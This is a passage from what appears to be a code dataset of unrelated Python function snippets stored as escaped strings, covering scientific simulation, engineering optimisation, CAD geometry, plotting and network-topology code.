newArc.getStartPt()):\n # stesso verso del vecchio arco\n return newArc, inverseArc\n else:\n return newArc, not inverseArc\n \n return newArc", "def _define_biophysics(self):\n\t\tfor node in self.node:\n\t\t\tnode.nseg=1\n\t\t\tnode.diam=self._nodeD\n\t\t\tnode.L=self._nodeLength\n\t\t\tnode.Ra=self._rhoa/10000\n\t\t\tnode.cm=2\n\t\t\tnode.insert('axnode')\n\t\t\tnode.insert('extracellular')\n\t\t\tnode.xraxial[0]=self._Rpn0\n\t\t\tnode.xg[0]=1e10\n\t\t\tnode.xc[0]=0\n\n\t\tfor mysa in self.mysa:\n\t\t\tmysa.nseg=1\n\t\t\tmysa.diam=self._fiberD\n\t\t\tmysa.L=self._paraLength1\n\t\t\tmysa.Ra=self._rhoa*(1/(self._paraD1/self._fiberD)**2)/10000\n\t\t\tmysa.cm=2*self._paraD1/self._fiberD\n\t\t\tmysa.insert('pas')\n\t\t\tmysa.g_pas=0.001*self._paraD1/self._fiberD\t\t\n\t\t\tmysa.e_pas=-80\n\t\t\tmysa.insert('extracellular')\n\t\t\tmysa.xraxial[0]=self._Rpn1\n\t\t\tmysa.xg[0]=self._mygm/(self._nl*2)\n\t\t\tmysa.xc[0]=self._mycm/(self._nl*2)\n\n\t\tfor flut in self.flut:\n\t\t\tflut.nseg=1\n\t\t\tflut.diam=self._fiberD\n\t\t\tflut.L=self._paraLength2\n\t\t\tflut.Ra=self._rhoa*(1/(self._paraD2/self._fiberD)**2)/10000\n\t\t\tflut.cm=2*self._paraD2/self._fiberD\n\t\t\tflut.insert('pas')\n\t\t\tflut.g_pas=0.0001*self._paraD2/self._fiberD\t\t\n\t\t\tflut.e_pas=-80\n\t\t\tflut.insert('extracellular')\n\t\t\tflut.xraxial[0]=self._Rpn2\n\t\t\tflut.xg[0]=self._mygm/(self._nl*2)\n\t\t\tflut.xc[0]=self._mycm/(self._nl*2)\n\t\t\n\t\tfor stin in self.stin:\n\t\t\tstin.nseg=1\n\t\t\tstin.diam=self._fiberD\n\t\t\tstin.L=self._interLength\n\t\t\tstin.Ra=self._rhoa*(1/(self._axonD/self._fiberD)**2)/10000\n\t\t\tstin.cm=2*self._axonD/self._fiberD\n\t\t\tstin.insert('pas')\n\t\t\tstin.g_pas=0.0001*self._axonD/self._fiberD\n\t\t\tstin.e_pas=-80\n\t\t\tstin.insert('extracellular')\n\t\t\tstin.xraxial[0]=self._Rpx\n\t\t\tstin.xg[0]=self._mygm/(self._nl*2)\n\t\t\tstin.xc[0]=self._mycm/(self._nl*2)", "def right_boundary(linkp, pn, H0, V0, H, V, links1, p, pump, valve, dt,\n H10, V10, utype, dtype,\n friction, dVdt, dVdx, dVdt10, dVdx10):\n\n # Properties of current pipe\n link1 = [p[abs(i)-1] for i in links1]\n f = linkp.roughness # unitless\n D = linkp.diameter # m\n g = 9.8 # m/s^2\n a = linkp.wavev # m/s\n n = linkp.number_of_segments # spatial discretization\n KD = linkp.roughness_height\n\n # inner nodes\n if 
friction == 'steady':\n H[1:-1], V[1:-1] = inner_node_steady(linkp, H0, V0, dt, g)\n elif friction == 'quasi-steady':\n H[1:-1], V[1:-1] = inner_node_quasisteady(linkp, H0, V0, dt, g)\n else:\n H[1:-1], V[1:-1] = inner_node_unsteady(linkp, H0, V0, dt, g,\n dVdx, dVdt)\n\n # Pipe start (inner boundary conditions)\n V1 = V10; H1 = H10 # upstream node\n V2 = V0[1]; H2 = H0[1] # downstream node\n dVdx1 = dVdx10 ; dVdx2 = dVdx[0]\n dVdt1 = dVdt10 ; dVdt2 = dVdt[1]\n if utype[0] == 'Pipe':\n if linkp.start_node.transient_node_type == 'SurgeTank':\n shape = linkp.start_node.tank_shape\n H[0], V[0], Qs = surge_tank(shape, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.start_node.water_level = H[0]\n linkp.start_node.tank_flow = Qs\n if linkp.start_node.transient_node_type == 'Chamber':\n shape = linkp.start_node.tank_shape\n H[0], V[0], Qs, zp = air_chamber(shape, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.start_node.water_level = zp\n linkp.start_node.tank_flow = Qs\n\n else:\n elev = linkp.start_node.elevation\n emitter_coeff = linkp.start_node.emitter_coeff + linkp.start_node.demand_coeff\n block_per = linkp.start_node.block_per\n H[0], V[0] = add_leakage(emitter_coeff, block_per,link1, linkp, elev,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif utype[0] == 'Pump':\n pumpc = pump[0]\n H[0], V[0] = pump_node(pumpc, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n elif utype[0] == 'Valve':\n valvec = valve[0]\n H[0], V[0] = valve_node(valvec, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n # Pipe end (outer boundary conditions )\n V1 = V0[n-1]; H1 = H0[n-1]\n dVdx1 = dVdx[n-1]\n dVdt1 = dVdt[n-1]\n if dtype[0] == 'Reservoir' or dtype[0] == 'Tank':\n H[n], V[n] = rev_end (H1, V1, H[n], n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n if dtype[0] == 'Valve':\n H[n], V[n] = valve_end (H1, V1, V[n], n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n if dtype[0] == 'Junction':\n elev = linkp.end_node.elevation\n H[n], V[n] = dead_end (linkp ,H1, V1, elev, n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n\n\n return H, V", "def __init__(self, **kwargs):\n GaussBeam.__init__(self, **kwargs)\n self.scale = kwargs.get('scale',10.)\n self.mass = kwargs.get('mass', 6.0)\n self.s0 = kwargs.get('s0', 7.0)\n self.retro = kwargs.get('retro', 1.0)\n self.alpha = kwargs.get('alpha', 1.0)\n self.Er0 = Erecoil( self.l , self.mass) \n self.mW = 1000 * (self.s0 * self.Er0 ) \\\n * np.abs( np.pi / 8. 
/ uL(self.l) )\\\n * self.w[0]*self.w[1] / self.retro", "def makeBinaryChains():\n\t\n\t# retrieve the binding partner specifications\n\t(maxsize,types) = getTypes()\n\t\n\t# Do some basic argument checking for this model\n\tif (len(types) < 2):\n\t\tprint \"Number of defined types must equal two for binary chain calculations.\"\n\t\treturn\n\tif (maxsize == 0):\n\t\tprint \"Must specify a valid maximum number for one or more components.\"\n\t\treturn\n\n\tallChains = []\n\tnewChainsA = [[]]\n\tnewChainsB = []\n\t\n\ttypeA = types[0]\n\ttypeB = types[1]\n\t\n\t# start the chain with a single type A component\n\taddComponent(newChainsA[0],typeA,0,0)\n\n\tdepth = 0\n\tfor n in range(maxsize):\n\t\tdepth+=1\n\t\t\n\t\t# go through all the chains created last iteration and append B components\n\t\tnewChainsB = []\n\t\tfor thisChain in newChainsA:\n\n\t\t\t# get a list of new available sites in the provided chain\n\t\t\t# by setting depth -1, we will only add to components added last round\n\t\t\topenSites = makeSiteList(thisChain,typeB,depth-1)\n\t\t\t\n\t\t\t# make all the descendants from the current chain and append them to the pool\n\t\t\tif (n == 0) and (typeA['sym']): #if the starting binder is symmetric, no need to start chains at all its sites\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,-1)\n\t\t\telse:\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,depth)\n\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsB))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + newChainsB\n\t\t\n\t\tdepth+=1\n\t\t\n\t\t# add an additional component to all the previously modified chains\n\t\tnewChainsA = []\n\t\tfor thisChain in newChainsB:\n\n\t\t\topenSites = makeSiteList(thisChain,typeA,depth-1)\n\t\t\tnewChainsA = newChainsA + fillSites(openSites,thisChain,typeA,depth)\n\t\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsA))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + newChainsA\n\n\treturn allChains", "def __init__(self, x_min, x_max, y_min, y_max, bs_number, ue_number,\n layer=1, power=1.0, bs_distribution=\"square_grid\",\n ue_distribution=\"gaussian\", ue_sigma=0,\n if_fix_bs=True,\n bs_radius_1=50,\n grid_l_1=10,\n grid_l_2=10):\n BaseRegion.__init__(self, x_min, x_max, y_min, y_max)\n BaseBS.__init__(self, bs_number, layer, power, bs_distribution, if_fix_bs)\n BaseUE.__init__(self, ue_number, ue_distribution, ue_sigma)\n self.bs_radius_1_ = bs_radius_1\n self.grid_l_1_ = grid_l_1\n self.grid_l_2_ = grid_l_2\n if not if_fix_bs:\n self.set_bs_to_region()\n self.set_ue_to_region()\n self.bs_ue_dict_ = {}\n # a dict that show which ue belong to which bs\n # key: 0, 1, ..., num_bs\n # value: 0, 1, ..., num_ue belong to the key\n self.select_ue()", "def constrain_buckling(self, method=1, ms=0.1):\n self.create_dvars()\n eltype = self.elements[0].type\n\n # reading constants\n dtable_E = self.dtables['STRE'][0]\n dtable_nu = self.dtables['STRnu'][0]\n\n if method == 1 and self.profile.lower() == 'z_t':\n # buckling equation\n deqatn = DEQATN(\n 'bf(t, b, h, E, nu, FA) = b-t/2.;'\n 'bw = h-t;'\n 'x = bf/bw;'\n 'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '\n '+ 249.62*x**2 -41.924*x + 6.4545;'\n 'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'\n 'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRZt']\n # reading constants\n dtable_b = self.dtables['STRZb'][0]\n dtable_h = self.dtables['STRZh'][0]\n # building DRESP1 that 
reads:\n # - axial stress\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n atta = OUTC['STRESS']['CBAR']['Axial']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,\n atta=atta, attb='', atti=eid)\n self.add_dresp(dresp_FA)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id]\n dresp2.dtable = [dtable_b, dtable_h, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_FA.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'z_t_b':\n # buckling equation\n deqatn = DEQATN(\n 'bf(t, b, h, E, nu, FA) = b-t/2.;'\n 'bw = h-t;'\n 'x = bf/bw;'\n 'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '\n '+ 249.62*x**2 -41.924*x + 6.4545;'\n 'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'\n 'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRZt']\n dvar_b = self.dvars['STRZb']\n # reading constants\n dtable_h = self.dtables['STRZh'][0]\n # building DRESP1 that reads:\n # - axial stress\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n atta = OUTC['STRESS']['CBAR']['Axial']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,\n atta=atta, attb='', atti=eid)\n self.add_dresp(dresp_FA)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id, dvar_b.id]\n dresp2.dtable = [dtable_h, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_FA.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'z_t_b_h':\n # buckling equation\n deqatn = DEQATN(\n 'bf(t, b, h, E, nu, FA) = b-t/2.;'\n 'bw = h-t;'\n 'x = bf/bw;'\n 'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '\n '+ 249.62*x**2 -41.924*x + 6.4545;'\n 'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'\n 'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRZt']\n dvar_b = self.dvars['STRZb']\n dvar_h = self.dvars['STRZh']\n # building DRESP1 that reads:\n # - axial stress\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n atta = OUTC['STRESS']['CBAR']['Axial']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,\n atta=atta, attb='', atti=eid)\n self.add_dresp(dresp_FA)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id, dvar_b.id, dvar_h.id]\n dresp2.dtable = [dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_FA.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'b_t':\n # buckling equation\n # - considers combined compression + shear\n # - disconsiders bending effects\n # - assumes 3 edges simply supported and one free unloaded edge\n deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'\n 'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FC = PC/(t*h);'\n 'Rc = FC/FCcr;'\n 'x = L/h;'\n 'ks = 0.0648*x**6 - 1.2338*x**5 + 
9.4869*x**4 -'\n '37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'\n 'ks = MAX(ks, 5.42);'\n 'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FS = PS/(t*h);'\n 'Rs = FS/FScr;'\n 'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRBt']\n # reading constants\n dtable_h = self.dtables['STRBh'][0]\n dtable_L = self.dtables['STRBL'][0]\n # building DRESP1s that read:\n # - axial force\n # - shear along Plane 1 (y axis)\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n code_PC = OUTC['FORCE']['CBAR']['Axial force']\n code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,\n atta=code_PC, attb='', atti=eid)\n dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,\n atta=code_PS, attb='', atti=eid)\n self.add_dresp(dresp_PC)\n self.add_dresp(dresp_PS)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id]\n dresp2.dtable = [dtable_h, dtable_L, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'b_t_h':\n # buckling equation\n # - considers combined compression + shear\n # - disconsiders bending effects\n # - assumes 3 edges simply supported and one free unloaded edge\n deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'\n 'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FC = PC/(t*h);'\n 'Rc = FC/FCcr;'\n 'x = L/h;'\n 'ks = 0.0648*x**6 - 1.2338*x**5 + 9.4869*x**4 -'\n '37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'\n 'ks = MAX(ks, 5.42);'\n 'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FS = PS/(t*h);'\n 'Rs = FS/FScr;'\n 'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRBt']\n dvar_h = self.dvars['STRBh']\n # reading constants\n dtable_L = self.dtables['STRBL'][0]\n # building DRESP1s that read:\n # - axial force\n # - shear along Plane 1 (y axis)\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n code_PC = OUTC['FORCE']['CBAR']['Axial force']\n code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,\n atta=code_PC, attb='', atti=eid)\n dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,\n atta=code_PS, attb='', atti=eid)\n self.add_dresp(dresp_PC)\n self.add_dresp(dresp_PS)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id, dvar_h.id]\n dresp2.dtable = [dtable_L, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n else:\n raise NotImplementedError('Stringer %s profile not supported!' 
%\n self.profile)", "def stretch_twist_jnts(start_jnt, end_jnt, twist_jnts):\n\n div = 1.0 / (len(twist_jnts)+1)\n for i, joint in enumerate(twist_jnts):\n\n weight = div*(i+1)\n mc.pointConstraint(start_jnt, joint, weight=1.0-weight)\n mc.pointConstraint(end_jnt, joint, weight=weight)", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'F')\n\n from sage.combinat.root_system.weyl_group import WeylGroup\n self._weyl = WeylGroup(['A', kBoundedRing.k, 1])\n\n km = kBoundedRing.km()\n self.module_morphism(self._F_to_m_on_basis,codomain=km).register_as_coercion() # morphism from affine Schur functions to k-bounded-m\n km.module_morphism(self._m_to_F_on_basis,codomain=self).register_as_coercion() # morphism from k-bounded-m basis to affine-Schur basis", "def plot_mass_flow(self,\n watershed, \n output, \n title = 'Subbasin Reach Mass Flow Diagram',\n fontsize = 6, \n theight = 0.2, \n l = 8.5, \n w = 11, \n verbose = True, \n overwrite = True,\n ):\n\n if os.path.exists(output) and not overwrite:\n if verbose: print('file %s exists' % output)\n return\n elif verbose: print('generating a mass linkage plot\\n')\n\n fontheight = fontsize / 72.\n rheight = 3 * fontheight\n rwidth = 12 * fontheight\n xgap = fontheight\n ygap = rheight\n awidth = rheight / 4\n aheight = rheight / 3\n\n # set up a sheet to write the image\n\n fig = pyplot.figure(figsize = (w, l))\n\n ax = fig.add_subplot(111, aspect = 'equal')\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n t = ax.set_title(title)\n\n # divide the subbasins into rows and put them on the chart\n # start at the bottom to organize the linkages better\n\n rows = [watershed.outlets, ['outlet']]\n\n top = False\n while not top:\n row = []\n for next in rows[0]:\n for subbasin in watershed.updown:\n if watershed.updown[subbasin] == next: row.append(subbasin)\n if len(row) > 0: \n rows.insert(0, row)\n else: \n top = True\n\n # add an inlet box in the row above each inlet\n\n for inlet in watershed.inlets: \n\n i = 0\n while i < len(rows) - 1:\n\n for subbasin in rows[i]:\n\n if subbasin == inlet:\n \n # find the position of the subbasin in the chart\n\n j = rows[i].index(inlet)\n\n if i > 0:\n\n # figure out where the subbasins point\n \n updowns = [watershed.updown[s] for s in rows[i-1]]\n \n # if first or last, add it there in the row above\n\n if j == 0: \n rows[i-1].insert(0, 'inlet')\n elif j == len(rows[i]) - 1: \n rows[i-1].append('inlet')\n else:\n\n # find the place to add in the preceeding row \n\n n = updowns.index(rows[i][j-1]) + 1\n rows[i-1].insert(n, 'inlet')\n\n i += 1\n\n # write the subbasin boxes to the chart\n\n middle = math.ceil(w // (rwidth + xgap)) // 2\n last = 0\n\n # keep track of the bounding box of the plot\n\n xmin, ymin, xmax, ymax = middle, 0, middle, 0\n\n for i in range(len(rows)):\n\n row = rows[i]\n \n y = (ygap + rheight) * i + theight\n\n # figure out which cell to put in the main column\n\n if i == 0:\n main = row[(len(row) - 1) // 2]\n elif i < len(rows) - 1:\n main = watershed.updown[rows[i-1][last]]\n else: main = 'outlet'\n\n start = middle - row.index(main)\n\n if i < len(rows) - 1: next_row = rows[i + 1]\n\n for subbasin in row:\n x = (rwidth + xgap) * (start + row.index(subbasin))\n r = patches.Rectangle((x, y), rwidth, rheight, fill = False)\n\n # adjust the bounding box\n\n if x < xmin: xmin = x\n if x + rwidth > xmax: xmax = x + rwidth\n if y < ymin: ymin = y\n if y + rheight > ymax: ymax = y + rheight\n\n if subbasin != 'outlet': 
ax.add_patch(r)\n\n b = ax.text(x + rwidth / 2, y + rheight / 2, subbasin,\n horizontalalignment = 'center',\n verticalalignment = 'center')\n\n # draw the arrow\n\n if i < len(rows) - 1:\n\n x1 = x + rwidth / 2\n\n if i < len(rows) - 2 and subbasin != 'inlet':\n next = watershed.updown[subbasin]\n next_start = (middle - \n next_row.index(watershed.updown[main]))\n x2 = ((rwidth + xgap) * \n (next_start + next_row.index(next))\n + rwidth / 2)\n\n elif subbasin == 'inlet':\n next = watershed.inlets[0]\n next_start = (middle - \n next_row.index(watershed.updown[main]))\n\n x2 = ((rwidth + xgap) * \n (next_start + next_row.index(next))\n + rwidth / 2)\n\n else:\n next_start = middle\n x2 = ((rwidth + xgap) * (middle) + rwidth / 2)\n\n a = pyplot.arrow(x1, y + rheight, x2 - x1, ygap, \n head_width = awidth, head_length = aheight,\n fc = 'k', ec = 'k', \n length_includes_head = True)\n ax.add_patch(a)\n\n last = row.index(main)\n i += 1\n \n pad = 0.02\n\n xmin = xmin - (xmax - xmin) * pad\n xmax = xmax + (xmax - xmin) * pad\n ymin = ymin - (ymax - ymin) * pad\n ymax = ymax + (ymax - ymin) * pad\n\n ax.set_xlim(xmin, xmax)\n ax.set_ylim(ymax, ymin)\n pyplot.axis('off')\n pyplot.savefig(output, dpi = 200)\n\n pyplot.clf()\n pyplot.close()", "def greedy_shrink(self):\n while self.single_greedy_shrink_iteration():\n self.run_shrink_pass(\"lower_common_block_offset\")", "def build_links_capacity(self):\n\n links_capacity = {}\n # Iterates all the edges in the topology formed by switches\n for src, dst in self.topo.keep_only_p4switches().edges:\n bw = self.topo.edges[(src, dst)]['bw']\n # add both directions\n links_capacity[(src, dst)] = bw\n links_capacity[(dst, src)] = bw\n\n return links_capacity", "def __bcc_top_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def setup(self):\n self.vert1 = TestVertex(10, \"New AbstractConstrainedVertex 1\")\n self.vert2 = TestVertex(5, \"New AbstractConstrainedVertex 2\")\n self.vert3 = TestVertex(3, \"New AbstractConstrainedVertex 3\")\n self.edge1 = SimpleApplicationEdge(self.vert1, self.vert2,\n None, \"First edge\")\n self.edge2 = SimpleApplicationEdge(self.vert2, self.vert1,\n None, \"Second edge\")\n self.edge3 = SimpleApplicationEdge(self.vert1, self.vert3,\n None, \"Third edge\")\n self.verts = [self.vert1, self.vert2, self.vert3]\n self.edges = [self.edge1, self.edge2, self.edge3]\n self.graph = ApplicationGraph(\"Graph\", self.verts, 
self.edges)\n\n flops = 1000\n (e, ne, n, w, sw, s) = range(6)\n\n processors = list()\n for i in range(18):\n processors.append(Processor(i, flops))\n\n links = list()\n links.append(Link(0, 0, 0, 0, 1, s, s))\n\n _sdram = SDRAM(128 * (2**20))\n\n links = list()\n\n links.append(Link(0, 0, 0, 1, 1, n, n))\n links.append(Link(0, 1, 1, 1, 0, s, s))\n links.append(Link(1, 1, 2, 0, 0, e, e))\n links.append(Link(1, 0, 3, 0, 1, w, w))\n r = Router(links, False, 100, 1024)\n\n ip = \"192.162.240.253\"\n chips = list()\n for x in range(5):\n for y in range(5):\n chips.append(Chip(x, y, processors, r, _sdram, 0, 0, ip))\n\n self.machine = Machine(chips)\n self.bp = BasicPartitioner()", "def addBP(self, bp, parent=None, joint_end=None):\n\n log.debug('addBP')\n body = ode.Body(self.world)\n mass = ode.Mass()\n if not parent:\n # if this is the root we have an absolute length,\n # root scale is relative to midpoint of min..max\n bp.length = bp.scale*(bpg.BP_MIN_LENGTH+(bpg.BP_MAX_LENGTH-bpg.BP_MIN_LENGTH)/2)\n bp.isRoot = 1\n else:\n # otherwise child scale is relative to parent\n bp.length = parent.length * bp.scale\n bp.isRoot = 0\n # limit the bp length\n bp.length = min(bp.length, bpg.BP_MAX_LENGTH)\n # mass along x axis, with length without caps==bp.length\n # arg 3 means aligned along z-axis - must be same in renderer and Geoms\n mass.setCappedCylinder(CYLINDER_DENSITY, 3, CYLINDER_RADIUS, bp.length)\n # attach mass to body\n body.setMass(mass)\n # create Geom\n # aligned along z-axis by default!!\n geom = ode.GeomCCylinder(self.space, CYLINDER_RADIUS, bp.length)\n self.geoms.append(geom)\n self.geom_contact[geom] = 0\n # remember parent for collison detection\n if not parent:\n geom.parent = None\n else:\n geom.parent = parent.geom\n # attach geom to body\n geom.setBody(body)\n log.debug('created CappedCylinder(radius=%f, len=%f)', CYLINDER_RADIUS, bp.length)\n # assert(not in a loop)\n assert not hasattr(bp, 'geom')\n # ref geom from bodypart (used above to find parent geom)\n bp.geom = geom\n\n # set rotation\n (radians, v) = bp.rotation\n log.debug('radians,v = %f,%s', radians, str(v))\n q = quat(radians, vec3(v))\n rotmat = q.toMat3()\n if parent:\n # rotate relative to parent\n p_r = mat3(parent.geom.getRotation()) # joint_end *\n log.debug('parent rotation = %s', str(p_r))\n rotmat = p_r * rotmat\n geom.setRotation(rotmat.toList(rowmajor=1))\n log.debug('r=%s', str(rotmat))\n geom_axis = rotmat * vec3(0, 0, 1)\n log.debug('set geom axis to %s', str(geom_axis))\n (x, y, z) = geom.getBody().getRelPointPos((0, 0, bp.length/2.0))\n log.debug('real position of joint is %f,%f,%f', x, y, z)\n # set position\n if not parent:\n # root - initially located at 0,0,0\n # (once the model is constructed we translate it until all\n # bodies have z>0)\n geom.setPosition((0, 0, 0))\n log.debug('set root geom x,y,z = 0,0,0')\n else:\n # child - located relative to the parent. 
from the\n # parents position move along their axis of orientation to\n # the joint position, then pick a random angle within the\n # joint limits, move along that vector by half the length\n # of the child cylinder, and we have the position of the\n # child.\n # vector from parent xyz is half of parent length along\n # +/- x axis rotated by r\n p_v = vec3(parent.geom.getPosition())\n p_r = mat3(parent.geom.getRotation())\n p_hl = parent.geom.getParams()[1]/2.0 # half len of par\n j_v = p_v + p_r * vec3(0, 0, p_hl*joint_end) # joint vector\n # rotation is relative to parent\n c_v = j_v + rotmat * vec3(0, 0, bp.length/2.0)\n geom.setPosition(tuple(c_v))\n log.debug('set geom x,y,z = %f,%f,%f', c_v[0], c_v[1], c_v[2])\n\n jointclass = { 'hinge':ode.HingeJoint,\n 'universal':ode.UniversalJoint,\n 'ball':ode.BallJoint }\n j = jointclass[bp.joint](self.world)\n\n self.joints.append(j)\n # attach bodies to joint\n j.attach(parent.geom.getBody(), body)\n # set joint position\n j.setAnchor(j_v)\n geom.parent_joint = j\n\n # create motor and attach to this geom\n motor = Motor(self.world, None)\n motor.setJoint(j)\n self.joints.append(motor)\n bp.motor = motor\n geom.motor = motor\n motor.attach(parent.geom.getBody(), body)\n motor.setMode(ode.AMotorEuler)\n\n if bp.joint == 'hinge':\n # we have 3 points - parent body, joint, child body\n # find the normal to these points\n # (hinge only has 1 valid axis!)\n try:\n axis1 = ((j_v-p_v).cross(j_v-c_v)).normalize()\n except ZeroDivisionError:\n v = (j_v-p_v).cross(j_v-c_v)\n v.z = 1**-10\n axis1 = v.normalize()\n log.debug('setting hinge joint axis to %s', axis1)\n log.debug('hinge axis = %s', j.getAxis())\n axis_inv = rotmat.inverse()*axis1\n axis2 = vec3((0, 0, 